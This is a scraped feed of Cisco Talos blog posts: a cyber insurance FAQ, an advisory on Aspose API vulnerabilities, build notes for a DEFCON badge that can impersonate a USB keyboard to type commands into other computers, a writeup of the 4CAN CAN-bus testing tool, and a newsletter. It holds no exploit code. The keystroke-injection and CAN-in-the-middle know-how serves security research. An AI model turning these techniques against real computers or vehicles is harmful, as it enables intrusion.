Quantcast
Channel: Cisco Talos Blog
Viewing all 1927 articles
Browse latest View live

What you — and your company — should know about cyber insurance

$
0
0

By Jon Munshaw and Joe Marshall. 

It’s no longer a question of “if” any given company or organization is going to hit with a cyber attack — it’s when. And when that attack comes, who is willing to take on that risk?

For some groups, it may be that they feel they are fully prepared to take on the challenge of defending against an attack or potentially recover from one. But cyber security insurance offers the ability to transfer that risk to an insurance company that can help you with everything from covering lost revenue to providing incident response as soon as you detect an attack.

Even back in 2016, Cisco Talos called the realm of cyber insurance “new and immature.”  But since then, the market has changed drastically, and these kinds of policies are becoming more popular. Still, some businesses have been slow to adopt these policies. According to a study by J.D. Power & Associates and the Insurance Information Institute released in October 2018, 59 percent of businesses still do not have any form of cyber insurance.

But a recent wave of attacks — including the takedown of computer systems in Baltimore, a multi-million-dollar settlement from Equifax over a 2016 data breach, and the recent theft of millions of Captial One customers’ information— shows why it’s important to remain prepared for these kinds of scenarios.

Equifax is still recovering from a massive data breach in 2016 that cost the company hundreds of millions of dollars. A cyber policy the company had covered $125 million in costs associated with the attack, though Equifax admittedly could have used a bigger policy considering the breach cost a total of $1.4 billion.

Is cyber insurance the right choice for your company or organization? We spoke to two cyber insurance experts to get answers to the questions we had around cyber insurance to help you make an informed decision.

How similar is cyber insurance to the insurance we’re all used to (health, car, etc.)? 

Turns out, not very. Catherine Rudo, the vice president of cyber insurance at Nationwide, said handing out cyber insurance policies is nothing like other, more conventional policies. Rudo agreed to speak with Talos regarding security policies across the board and said her comments do not reflect the traditional Nationwide policy.

“If you compare cyber to property [insurance], I don’t think there’s a direct comparison,” she said. “Cyber stands on its own. It’s something that’s closer to a liability policy … not everyone needs it in the same way, but everyone needs it.”

Rather than the plug-in and play model of other policies like car insurance, where you’d put in the specific make, model, year and amount of coverage needed for your car, and the insurer spits out a quote, each cyber policy is going to be different.

Rudo said each policy must be assessed and written on a case-by-case basis. There’s a wide variety of factors that need to be considered, including intellectual property, potential extortion payments, liability coverage, etc.

For example, the risks inherent with a cyber policy for an electric company would be entirely different than a clothing store that collects point-of-sale payments.

What do insurers do to calculate initial risk in these policies? 

For an insurance company to underwrite a policy for a company, organization or even government entity, the insurer must evaluate several different areas of security risk.

For example, Rudo said that on most cyber insurance applications, the potential insured must answer questions about patching cadence, the number of endpoints that access their network, what (if any) firewalls are in place and what third-party vendors the company works with.

Leslie Lamb, Cisco’s head of risk management, knows firsthand what the application process is like.

Lamb has been a part of every cyber insurance policy Cisco has ever purchased, and said every year, they reassess the policy and always try to get additional coverage in some form or another. She said Cisco’s CISO, Steve Martino, has met with insurance underwriters every year to discuss what Cisco does to limit exposure to attackers, what new intelligence partnerships are in place and how the company mitigates risk.

“We essentially do a roadshow for them,” Lamb said, adding that the process usually starts about 120 days prior to the expiration of Cisco’s current policy.

There’s also the inherent risk that comes with certain industries. For example, public institutions may have a more expensive policy because they handle a large amount of intellectual property, making them a more enticing target.

There’s also the issue of the size of the business — obviously, larger companies are going to be targeted more often than a mom-and-pop corner store.

Rudo said that the premiums may even increase if the potential insured has a higher appetite for risk than another company or organization.

How long have cyber policies been around? 

Lamb says a common misconception is that cyber insurance policies have only been around for a few years, when in fact, they’ve existed for about 15 years, even dating back to the Y2K scare.

But Lamb said the popularity of the market has increased dramatically over the past five years.

“It has grown exponentially because of the things that have been happening,” she said. “People are aware of what’s going on...no one is immune to having a cyber incident.”

Lamb said many multi-national companies have had cyber insurance policies as long as they’ve been around, but middle-market companies are just starting to pick up on the trend now.

Are there limits to how much a policy may pay out for one attack alone? 

This will vary from policy to policy, but most of the time, yes.

Rudo said companies seeking out cyber insurance policies will shop around between companies looking for which insurer can offer them a larger “policy aggregate,” meaning the total amount the policy will cover.

Another option could be to take out a policy covering a certain number of records that could be stolen in an attack.

“There are some policies that have a limit for how much they’ll spend, but they’ll have a number of records,” she said. “Some policies will say they’ll give ‘X’ million for your data breach, and another may say they’ll cover ‘X’ number of records. These policies don’t tabulate the amount, just the number of records taken.”

What happens after you’re attacked? 

Bad news — you’ve been attacked and are now infected with ransomware. Good news, you purchased a cyber insurance policy.

This varies from policy to policy, but some insurance companies will even go as far to provide boots-on-the-ground incident response and forensic assistance to help you recover your data and restore operations as quickly as possible.

Here’s why that makes sense for the insurer: If they can help you recover your data, the damages realized will not be as severe and thus reducing the monetary amount of claim and the restoration of activity to the victim as quickly as possible.

In some cases, the insurer will act as an intermediary between the attacker and the victim to help pay the ransom if that’s the route the victim wants to take.

“If a customer chooses to pay the ransomware, the insurance company will pay it, and the insurance company will sometimes facilitate [the payment],” Rudo said. “They can access a vendor to help with the ransomware payment. An insurance company will also respect the wish of the client if they choose not to pay the ransom.”

For example, an insurance company can even assist the victim in converting traditional currency into cryptocurrency, which the attacker may request as payment.

To hear Talos’ take on whether to pay the ransom in these kinds of attacks, you can check out our roundtable here.

Once the insured has completely recovered from an attack, the insurer will usually re-evaluate the policy and premium. The insurance company will look at things like if the initial attack vector was remediated, if the attacker was completely eradicated from the system and what new protections may be in place post-infection.

What is the timeframe for which the policy will cover an attack? For example, what would happen if an attacker had been in a victim’s system for a year, but the insured only took out a policy six months ago? 

These policies pay out on discovery. So, for example, if a retailer had a card-skimming malware sitting on their system since January, but the company only took out a policy in October, the attack would still be covered if they discovered the breach in November of that same year.

“These policies are on a discovery basis,” Rudo said. “The policy begins when the buyer has discovered the loss. The only way there might be an exclusion is if there’s a retroactive date [on the policy].”

What is Cisco’s role in all of this? 

Last year, Cisco, Aon, Apple and insurance company Allianz collaborated to launch the industry’s first cyber risk management solution.

The solution combines cyber resilience evaluation services from Aon, technology from Cisco and Apple, and options for enhanced cyber insurance coverage from Allianz.  “Enhancements” to the traditional insurance policy that this program offers, may include severance pay for CISO’s in the event of a termination after a breach, special support agreements if the insured uses a certain percentage of Apple products and a shorter waiting time for coverage to kick in, according to Lamb.

Organizations using Cisco Ransomware Defense are eligible for such enhancements from Allianz.

Other considerations 

  • Rudo said intellectual property is generally not covered by security policies because it is too difficult to quantify. 
  • There are other liability policies that may be available to cover attacks that cause harm to a third party. For example, if an internet-of-things device was hacked in a way that it malfunctioned and injured a user, a cyber insurance policy would generally not cover that, but a separate liability policy would. 
  • Many insurance companies will have “cyber security panels” that step in during some attacks to aid and provide advice to the victim. Lamb said Cisco is currently part of a few of these types of panels, and is looking to join more. 

Vulnerability Spotlight: Multiple vulnerabilities in Aspose APIs

$
0
0

Marcin Noga of Cisco Talos discovered these vulnerabilities.

Cisco Talos recently discovered multiple remote code execution vulnerabilities in various Aspose APIs. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs, Microsoft Word files and more. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.

In accordance with Cisco's disclosure policy, Talos is disclosing these vulnerabilities after numerous unsuccessful attempts were made to contact Aspose to report these vulnerabilities.

Vulnerability details

Aspose Aspose.Cells LabelSst remote code execution vulnerability (TALOS-2019-0794/CVE-2019-5032)

An exploitable out-of-bounds read vulnerability exists in the LabelSst record parser of Aspose Aspose.Cells 19.1.0 library. A specially crafted XLS file can cause an out-of-bounds read, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information. 

Aspose Aspose.Cells number remote code execution vulnerability (TALOS-2019-0795/CVE-2019-5033)

An exploitable out-of-bounds read vulnerability exists in the Number record parser of Aspose Aspose.Cells 19.1.0 library. A specially crafted XLS file can cause an out-of-bounds read, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Read the complete vulnerability advisory here for additional information. 

Aspose Aspose.Words EnumMetaInfo code execution vulnerability (TALOS-2019-0805/CVE-2019-5041)

An exploitable stack-based buffer overflow vulnerability exists in the EnumMetaInfo function of Aspose Aspose.Words library, version 18.11.0.0. A specially crafted doc file can cause a stack-based buffer overflow, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information. 

Versions tested

CVE-2019-5033 and CVE-2019-5034 affect Aspose.Cells, version 19.1.0. CVE-2019-5041 affects Aspose.Words, version 18.11.0.0.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49756, 49757, 49760, 49761, 49852, 49853

Talos DEFCON badge build instructions and use

$
0
0

By Patrick Mullen.

We want to thank everyone who stopped by the Cisco Talos booth at DEFCON's Blue Team Village earlier this month. We handed out these badges at our area where we had Snort rules challenges, reverse-Capture the Flag and recruiters ready to answer attendees' career advice questions.

Unfortunately, there were two bugs in the board as created, which should be expected when it was created in such a short time, but we have a guide for how you can fix these. Once these bugs are fixed, you'll have a fully functional Digispark clone that can be used for several projects, including impersonating a USB keyboard, as our example sketch does. You can also attach leads to the open jumpers to get full access to all of the pins from the ATtiny85 to drive your own projects.

Power is provided directly by the USB port when used as a USB device, by a USB charger, or via J2 at the top of the board. The center pin is GND, the right pin is for regulated for five volts, or the left pin can handle anywhere from 5V to 20V. During Defcon, we powered it with a nine-volt battery for convenience.

The first bug is really easy — diode D1 on the lower right of the board has the line indicating the direction for the cathode on the wrong end due to using a faulty schematic.

The second bug took a bit more creativity to overcome, but the actual assembly isn’t too difficult and makes the build that much more fun. The issue is that the schematic for the USB port was rotated, so we need to tweak the circuit so everything connects to the right place. I think the end result adds character to the badge and is quite effective.

Tools needed:
  • Small straight slot (flat head) screwdriver
  • Soldering iron with a small tip
  • Solder
  • Small wire cutters
  • Small needle-nose pliers are helpful
  • Multimeter, or at least a continuity tester (beeps when two connections are attached)
  • A magnifying glass can be useful to check your work
  • Arduino IDE for programming the chip
              Parts list:
              • ATtiny85 w/ Digispark bootloader. Bootloader is needed for programming over USB
              • 8 pin DIP chip holder
              • 5V power regulator
              • Through-hole mini USB connector
              • (2) 3.6V zener diodes
              • (1) Schottky diode
              • (2) 75 ohm resistors (or 100 ohm or 66.5 ohm as in schematic)
              • (1) 1.5k ohm resistor
              • (2) 330 ohm resistors
              • (2) LEDs
              • (1) 0.1 uF capacitor
              • (1) 4.7 uF capacitor
              For reference, this is the board schematic. Note this schematic has the diode from USB 5V pin to the 5V rail upside down. The line indicating the cathode should be pointing up toward the 5V rail, not toward the USB port. But other than that, this is the best schematic I’ve found and is released under the creative commons license.



              Prepare the board

              To rewire the USB port in a way that is easier to build the board, we are going to have to cut one of the lines on the board.  If you want to be fancy, you can do this by drilling through the board, but scratching through the conductor (“line/wire”) with a straight slot screwdriver is more than sufficient.

              Be careful to not hit one of the other lines and if you have a continuity tester (or a multimeter set on resistance and verify infinite resistance aka open connection), it’s always good to verify you’ve done so successfully and completely.

              The line we want to cut (viewed from the back of the board) starts from the bottom-most connector of the USB jack, but cut it *after* the connection hole, before the ‘T’ junction.  See the photo since I’m not getting paid by the word and don’t want to write a thousand of them.  Note the multimeter is demonstrating there is no connection between the pin on the USB connector and that connection point on the board after our “cut.”


              Prepare the USB connector

              Thankfully, one of the USB connections is not used and this allows us to modify the jack to get rid of the unused pin and then create a bridge on the board to bring the pin that is used over to the circuit where it was originally supposed to be connected.

              To remove the unused pin, flip the USB connector over so the pins are on top and the “open-end” is to the left. The pin you want to remove is the top left one.

              I had great success by using the small straight slot screwdriver to bend the pin toward the “back” of the connector (to the right in the photo), then using needle-nose pliers to wiggle it back and forth until it broke off cleanly.



              Solder on the USB connector

              NOTE: We are going to need to bridge a connector here and to keep everything you need within the kit, we’re going to use part of a lead from one of the components.
              1. Put the USB connector into the holes from the front side of the board and flip the board over.  You can use the power regulator (the black component with the metal fin) to keep the board level while you solder.
              2. Solder the two positioning holes on the left to keep the connector from moving while soldering the pins.
              3. Put one of the legs of the burnt orange / brown capacitor into the hole on the left with the pin sticking through it. Again, a picture helps here. All we are doing here is using a bit of that nice, thin wire from the capacitor to bridge between the two connectors on the left.
              4. Solder all FOUR of the pins from the USB connector. DO NOT SOLDER THE EMPTY HOLE. These pins and these holes are really small.  Now would be a good time to clean your soldering tip and make sure you don’t use too much solder and bridge connections.
              5. Cut the leg that you soldered into the hole about halfway up the leg. You don’t need much of the leg to go through the board when you solder the capacitor into the circuit, and you only need enough to reach to the open connection on the USB port.
              6. Bend the cut leg over to the open connector, lay it across the connector being careful not to short any others, and solder it in place. Using your screwdriver can provide extra leverage and precision to bend the bridge all the way to the board.









              Soldering on the "normal parts"

              You can now solder on all components except the three diodes. The diodes are the “glass-looking” red things with the black line and the black with silver line component.

              Notes for assembly — be aware that some parts are unidirectional.
              1. The LEDs are unidirectional. The long leg goes through the hole with the square contact around it. NOTE: The two LEDs have square contact on opposite sides. 
              2. The yellow capacitor is unidirectional. The long leg goes toward the "+" toward the bottom of the board. The burnt orange/brown capacitor can go in either way. The capacitors are connected in parallel, so it doesn’t matter which goes into the C1 or C2 connection.
              3. R4 and R5, near the power regulator, are 330 ohms. In the kit, they are the fat resistors with orange-orange-brown stripes. Note the gold stripe on the resistors refer to the tolerance/"quality" of the resistor and doesn't really matter for this circuit.
              4. R3 and R1, the top two resistors below the USB connector, are 75 ohms, with purple-green-black stripes. If your kit does not include these resistors (we bought every 75 ohm resistor at Fry's in Las Vegas), 100 ohms is a common size that will also work.  
              5. R2, the bottom resistor on the right side, is 1.5k ohms and has brown-green-red stripes. 
              6. The big blue resistors in the kits are not used. They were supposed to be 66.5 ohms. They are 66.5 *thousand* ohms. Oops.
              7. The chip connector has a notch on it that lines up with the break in the silkscreen to the right.  This is used to indicate pin 1 on the chip. Do not have the chip in the socket while soldering it in place. Do not forget to trim the ends of the leads off after soldering.
              8. The power regulator (the black thing with the metal fin) has a line on the board on the left side that indicates where the cooling fin goes. When connecting this component, I find that leaning it to the right when soldering it on will give you a little extra room to bend it over to the left so it’ll lie flat when finished.

              Soldering on "funky bits"

              Now, we need to reverse the 5V and GND circuits. I think steps 1 and 2 below make more sense if you see what the circuit will look like before reading it, so this is what you should have after step 2:

              1. Take one of the zener diodes (the little glass-looking things with the red underneath and the black stripe).  The black stripe lines up with the stripe on the circuit board printing.  But, because this is the “funky” section, we’re going to connect it “weird.”
                1. Insert the zener diode into the *left* diode slot, U3, but stick it in so it points straight up, with the black line down against the board.
                2. Solder it in the straight-up position.
                3. When you cut the lead on the back of the board, SAVE THE CLIPPING.  We’ll need it in a moment.
                4. Leave the diode in this position for now.
              2. Take the other zener diode, and bend the end with the black stripe as if you were going to mount it normally, but leave the other leg straight.
                1. Insert it into the top connector of U2 (so the stripes match) but angle it to the left so it crosses the U3 silk screening before you solder it on.
                2. You may find that with the other components on the board, and the relative sizes of the wire and the hole, that it’s easier to solder this component from the top if you leave yourself room after the bend.  Cut off the extra in the back of the board and solder from the back for a good connection if necessary.
                3. Bend the loose leg of U2 so it goes around the bottom hole of U3 and across the top of the chip holder.  This is easier with needle-nose pliers.  We will be soldering this leg to the bottom leg of U3, so don’t worry about keeping a distance from the wire.

              Connect the zener diodes together

              1. Returning to U3 (the zener diode on the left), bend the remaining wire forward, through the bottom hole for the diode, and solder it into place.  Using needle-nose pliers to make the bend and insertion may make it easier.  Be gentle so you don’t snap the diode in half.  There’s no reason to get this too tight and risk breaking the component.
                1. Solder the bottom leg of U2 to the bent leg of U3. Don’t forget to make sure that U3 is soldered into the board as described in the previous step.
              2. Connect the zener diodes to GND
                1. Solder the leg you removed from U3 into the top connector for D1, with the leg sticking straight up out of the board.  We are going to bend it so we can connect it to the tail of U2 (which has been bent around the bottom wire from U3).
                2. Bend the leg up to meet the long lower leg from U2 and solder them together.  You should now have a connection from the top of D1 to both diodes, at the bottom of U3.
              3. Solder the schottky (black w/ silver stripe) diode
                1. For this one, the silkscreen is backward because the schematic I was using had this diode backward, so ignore the marking on the board. We are using the long legs of this diode to make a long connection to fix the circuit without needing additional wire. With the fix, the proper connection is for the end with the silver stripe to connect to the bottom of D1 and the other end to connect to the bottom of U2.  Feel free to tuck this in as much as you can, but make sure you are clear of any wires touching.  If you’re feeling particularly frisky, you can use the diode itself as an insulator against the connector for U2 that goes around the chip carrier, or some electrical tape.
              4. Insert the chip
                1. There is a little dot on top that indicates pin 1. That goes toward the end of the chip carrier with the indent (to the right of the board).
                This is what the completed circuit should look like:

                Programming the board

                I'm going to outsource the programming of the board now to this YouTube tutorial. Remember, this board uses the ATtiny85 chip and is a Digispark clone. If you have any issues, search for those names online and you should get what you need.

                Everywhere the creator of this video says “Digispark board,” hear “Talos Defcon 27 Blue Team Village badge” because they are the same.
                1. Open the Arduino IDE and load the Digispark board managers (1:48 in the video).
                2. Load the drivers (3:54 in the video).  Hopefully, with our board and the bootloader we have installed, this step will be easier for you.  He provides information and links if you have troubles.
                3. Load the Arduino IDE (7:24 in the video).  If you want to do the blink sketch he talks about, you’re welcome to do so.  Or just go right to the excitement and do the next step instead!
                4. Copy and paste this sketch
                Now you can upload the program. Don’t forget to unplug the badge (if necessary) and plug it in when the IDE tells you to (as described at 9:07 in the video).

                Now that your badge is programmed, you no longer need the Arduino IDE or drivers to control other computers. Just plug it in, wait five seconds while the board initially identifies itself as an Arduino then disconnects and reconnects as a keyboard, and watch it do its thing.  LED1 is a status light as programmed in the sketch — it turns on when it starts typing and turns off when it’s completed all of its commands.

                If you want your badge to send different commands, change the lines that call the function type() and tell it to type something else. Please note that these chips have extremely tiny memories and unfortunately the DigiSpark library takes up a lot of room so you don’t have a ton of text you can type, but you do have a fair amount. If you look into trimming the installed size of the code you should be able to get more program onto the chip.

                Some other notes on the badge:

                • If you get female lead connectors and solder them to J1 and J2, you can use the ATtiny85 to do whatever you want, as long as you only need a few data lines and a small memory.  You can, of course, solder to the leads directly if you want, but by putting in female leads you can make a reusable circuit.  Note it is probably not a good idea to drive the data pins however you want while connected to a USB data cord.
                • J2 is for external power, so you can run the board while not connected to USB.  The middle connector is ground.  The connector on the right is for 5V *only*.  The connector on the left can run 5V-20V DC.
                • You can also power the circuit using a USB charging cable, but as stated above, it’s not recommended to be connected to the computer USB data port if you’re running a sketch that is not specifically for driving USB data, like a keyboard.
                • You can program it either through the USB as you did above or by using something like an Arduino UNO as an ISP as described in this video.
                • If you want to change the bootloader (or if you get a stock ATtiny85 that doesn’t have the boot loader we installed on the ones in the kit), directions are in this video.
                We hope to continue and do other badges in the future, hopefully, next time without bugs! We hope everyone had a great time at Hacker Summer Camp and look forward to next year where we'll have all new challenges, badges and other fun things to poke at.

                  Article 1

                  $
                  0
                  0

                  New 4CAN tool helps identify vulnerabilities in on-board car computers


                  By Alex DeTrano, Jason Royes, and Matthew Valites.


                  Executive summary


                  Modern automobiles contain hundreds of sensors and mechanics that communicate via computers to understand their surrounding environment. Those components provide real-time information to drivers, connect the vehicle to a global network, and in some cases use that telemetry to automatically drive the vehicle. Like any computer, those in vehicles are susceptible to threats, such as vulnerabilities in software, abuse via physical-access, or even allowing remote control of the vehicle, as recently demonstrated byWired and a DARPA-funded team of researchers.

                  Allied Market Research estimates the global connected car market to exceed $225 billion by 2025. To help secure this emerging technology, Cisco has dedicated resources for automobile security. The Customer Experience Assessment & Penetration Team (CX APT) represents the integration of experts from the NDS, Neohapsis, and Portcullis acquisitions. This team provides a variety of security assessment and attack simulation services to customers around the globe (more infohere). CX APT specializes in identifying vulnerabilities in connected vehicle components.

                  During a recent engagement, the Connected Vehicle Security practice identified a gap in tooling for automobile security assessments. With ease-of-use, modern car computing requirements, and affordability as motivating factors, the Connected Vehicle Security practice has built and is open-sourcing a hardware tool called "4CAN" with accompanying software, for the benefit of all automobile security researchers. We hope 4CAN will give researchers and car manufacturers the ability to test their on-board computers for potential vulnerabilities, making the vehicles safer and more secure for drivers before they even leave the lot.


                  What does a car's network look like?


                  Before jumping into the 4CAN hardware module itself, let's start with some automobile basics. For a modern vehicle to operate effectively, its network of hundreds of sensors and computers must communicate with each other. While vehicles and components employ Wi-Fi, Bluetooth, and cellular communication protocols, the backbone of a vehicle's network is a Controller Area Network (CAN), also referred to as the "CAN bus."


                  Access to the CAN bus from a physical perspective is typically via an ODB2 connector, often located on the driver-side lower dash, though it can sometimes also be accessed by removing side mirrors or external lights. Compromising the CAN bus can lead to total control of the vehicle, making it a prime target for pen testers and malicious attackers. Often, attacks against peripheral components such as Wi-Fi or LTE are ultimately an attempt to gain access to the CAN bus.


                  CAN Bus background


                  A typical vehicle's CAN bus is shown below. In a secure configuration, the critical components such as airbags and brakes communicate on separate CAN buses from the non-critical components, such as the radio or interior lights. Pen testers and attackers with access to the CAN bus test for this separation of services looking for insecurely configured vehicles.


                  The CAN bus is a two-wire multi-master serial bus. Each device connected to the CAN bus is called a "node" or Electronic Control Unit (ECU). When a device sends out a message, or CAN frame, that message is broadcast to the CAN bus and received by every node. When two nodes broadcast a CAN frame at the same time, the arbitration ID, a type of unique node identifier on every CAN frame, determines message priority. The CAN frame with the lower arbitration ID takes priority over the higher arbitration ID.

                  Electrically, the CAN bus uses differential signaling as a means to reduce noise and interference. There is CAN-HI and a CAN-LO signal, and the two signals are inverse from each other. The bus also has a 120 ohm characteristic bus impedance. When performing a CAN-in-the-middle, the bus must be terminated with a 120 ohm resistor. The image shown below is fromWikipedia, which has an excellent overview of the CAN bus if you're interested in more detailed information.


                  Single CAN bus with multiple nodes


                  The simplest implementation of an automobile's network uses a single CAN bus. An example with 3 nodes is shown below. All connected nodes will see every CAN message published to the CAN bus. There is no ability to separate critical from non-critical nodes.


                  Multiple CAN buses with a gateway


                  A typical vehicle setup has multiple CAN buses combined with a gateway to arbitrate access between the CAN buses. This gateway acts as a firewall and can check CAN IDs to determine if the message should be allowed to traverse CAN buses. In this way, critical ECUs can be isolated from non-critical ECUs.




                  The vehicles that we have been testing have 4 CAN buses inside, all of which are connected to the gateway. The architecture looks something like this:


                  The security of each ECU on the bus is partly dependent on the gateway's ability to segregate traffic. Testing the gateway involves sending and looking for messages allowed to traverse disparate CAN buses. On four-bus systems, this test requires pen testers can access the four buses simultaneously.


                  Existing solutions


                  Several devices exist that allow testing of the CAN bus. Most of the devices use theMCP2515 CAN controller, which provides a serial peripheral interface (SPI) to connect with a microcontroller, and aMCP2551 CAN Transceiver orNXP TJA1050 CAN Transceiver, which generates and receives the electrical signals on the physical CAN bus. This table describes some of the CAN hacking solutions currently available on the market.


                  Each device has its pros and cons, but none completely met our needs of being easy to use, allowing access four buses, and doing so at an affordable price point. Here's how the currently available devices align with our needs.

                  In the absence of a compatible device we set out to solve this problem, doing so with the following technical motivators:

                  • Raspberry Pi compatible
                  • Easily enable or disable 120 ohm bus terminating resistors
                  • Natively supported by SocketCAN for easy Linux integration
                  • Inexpensive


                  Our Solution


                  We call the solution "4CAN," and designed it with the following goals in mind:

                  • Validating communication policy for intra-CAN bus communication.
                  • Fuzzing (sending randomized payloads) to components to identify vulnerabilities.
                  • Exploring the CAN commands used to control/interact with the vehicle.
                  • Simplify our testbench setup to keep everything organized and in sync.

                  Design

                  George Tarnovsky, a member of CX APT, is the originator or the 4CAN's design. The Raspberry Pi contains five hardware SPI channels so we decided to use the MCP2515 CAN Controller since it could interface with the Pi via SPI. We added a four-port DIP switch instead of physical jumpers or a solder bridge to easily enable the 120 ohm bus terminating resistors. The MCP2551 CAN transceiver was used as the CAN transceiver.

                  The high-level design is described in the below schematic, the more detailed version of which can be found here.



                  PCB layout

                  To be as compatible as possible, we aimed to conform to theRaspberry Pi HAT specification as closely as possible. The HAT spec limits the hardware dimensions, requiring us to use creative solutions to pack all the components on the board. Since we did not include an EEPROM and did not leave a cutout for the camera connector, the module is not HAT compliant per spec. These were conscious design decisions, since we will not be using a camera add-on and do not make use of the EEPROM.

                  All components are surface mounted, using the smallest component sizes we could find to minimize space on the board. The only exception to using the smallest components is the USB-UART connection. Instead of adding all the components ourselves, we went with a premade board containing all the circuitry. This board sits on top of the 4CAN. A resistor pack further reduces part-count and has a smaller footprint than four individual resistors. Rather than drive all four CAN controllers with individual crystal oscillators, we opted to use just one. This can introduce clock skew, because each component receives the clock in serial, rather than in parallel at the same time. To limit the effect of clock skew, we kept the clock lines as short as possible. In order to keep costs down, we used a 2-layer PCB design. While this limits routing options, the cost is significantly cheaper than a board with more layers. We also added the standard 40-pin GPIO header, so that the remaining GPIO can be used.

                  The final layout is shown below.





                  Before and after


                  Before


                  In order to test four CAN buses simultaneously, we required three CAN devices. Two TT3201 three-channel CAN Capes attached to Beaglebones, and one CanBerryDual attached to a Raspberry Pi. We also have another Raspberry Pi to remotely control the test vehicle. With this configuration, we can test sending CAN frames between any two combinations of CAN channels. Although this setup works, it is a bit unwieldy, requiring lots of wires making connection tracking and test aggregation difficult.


                  After


                  Using 4CAN, the test bench setup is vastly simplified. With a single Raspberry Pi, we can simultaneously test four CAN channels, and since the 4CAN exposes the entire 40-pin GPIO header, we can remotely control the test vehicle.




                  The simplicity of using 4CAN is easily observable on the physical test bench.

                  Before 4CAN:
                  Using 4CAN:

                  Usage


                  For the 4CAN to communicate with the Raspberry Pi, the Pi must be configured with four SPI channels enabled and tied to specific GPIO pins. Additionally the Pi's linux kernel requires additional drivers such as SocketCAN, which implements the CAN device drivers as network interfaces. From a user-space perspective,can-utils loads the SocketCAN drivers and provides capabilities to sniff CAN traffic, send CAN messages, replay captured CAN traffic, implement a CAN gateway to facilitate CAN-in-the-middle, and more.

                  CAN-in-the-Middle


                  To determine whether an ECU is sending or receiving a message or to modify CAN traffic in-flight, the 4CAN can be inserted between the CAN bus and an ECU to capture or possibly modify the traffic, to perform a CAN-in-the-Middle (CITM) attack. The required bridging can be enabled by combining can-util's 'cangw' command and ascript we have provided.

                  Sniffing Inter-CAN communication


                  The 4CAN allows us to test inter-CAN communication by sending a CAN message with a known payload on one CAN bus, and seeing if that same message appears on a different CAN bus. Doing so allows us to learn whether and how the CAN gateway is filtering or modifying messages. In some instances we have observed the CAN ID change for the same message across different buses. We provide ascript to facilitate this "transcan" testing.

                  Tool Release


                  The 4CAN is available on GitHub here.

                  Threat Source newsletter (Aug. 22)

                  $
                  0
                  0

                  Newsletter compiled by Jon Munshaw.

                  Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                  A lot of people may think that cyber insurance is this new, unexplored field that carries a lot of questions. But did you know that these policies have actually been around since Y2K fever? There are many more misconceptions about these policies, so we aimed to clear some of these up with this cyber insurance FAQ.

                  If you came out and saw us at DEFCON, chances are you got your hands on our super sweet badges. Unfortunately, there were a few small bugs, but we have a step-by-step guide that shows you how to fix those problems, and we walk through how to set it up to get your own Digispark clone.

                  This was also a busy week for vulnerabilities. Our discovery of several bugs in Google’s Nest camera has made headlines, since an attacker could use these to leak sensitive information. We also have a breakdown of multiple remote code execution vulnerabilities in different Aspose APIs.

                  We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

                  Upcoming public engagements with Talos

                  Event: “DNS on Fire” at Virus Bulletin 2019
                  Location: Novotel London West hotel, London, U.K.
                  Date: Oct. 2 - 4
                  Speaker: Warren Mercer and Paul Rascagneres
                  Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                  Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                  Location: Metro Toronto Convention Center, Toronto, Canada
                  Date: Oct. 7 - 10
                  Speaker: Edmund Brumaghin and Earl Carter
                  Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                  Cyber Security Week in Review

                  • Attackers behind a series of ransomware campaigns targeting more than 20 Texas cities are asking for a combined extortion payment of $2.5 million. One of the towns’ mayors say they will not give into the attackers’ demands. 
                  • This recent wave of ransomware attacks has cities across the U.S. bracing for similar attempts on their systems.  
                  • Controversial data-collection and surveillance company Palantir renewed its contract with U.S. Immigration and Customs Enforcement. The roughly $50 million contract will provide software to ICE used to manage, secure and analyze data, mainly used to identify individuals as they attempt to enter the U.S.  
                  • Security researchers discovered a new type of attack on Bluetooth devices called “KNOB.” If exploited successfully, this vulnerability could allow attackers to spy on the data being shared between two devices via Bluetooth, even if they’ve been paired previously.  
                  • Instagram expanded its bug bounty program to reward researchers who discover third-party apps that steal users’ login information. The program also covers apps that help users get bot followers and produce likes and comments on their posts. 
                  • Bernie Sanders is the first 2020 presidential candidate to formally reject law enforcement agencies’ use of facial recognition technology. Sanders called it “the latest example of Orwellian technology that violates our privacy and civil liberties under the guise of public safety” as part of his formal proposal to overhaul the criminal justice system. 
                  • Twitter banned state-run news agencies from purchasing ads on the platform. The new policy comes after a Chinese news organization ran ads condemning the recent protests in Hong Kong. 
                  • Movie ticket subscription service MoviePass exposed thousands of customers’ MoviePass card and credit card numbers. The company left a critical server unprotected without a password and was found at one point to contain 161 million records. 

                  Notable recent security issues

                  Title: Nest Cam IQ camera open to takeover, data disclosure
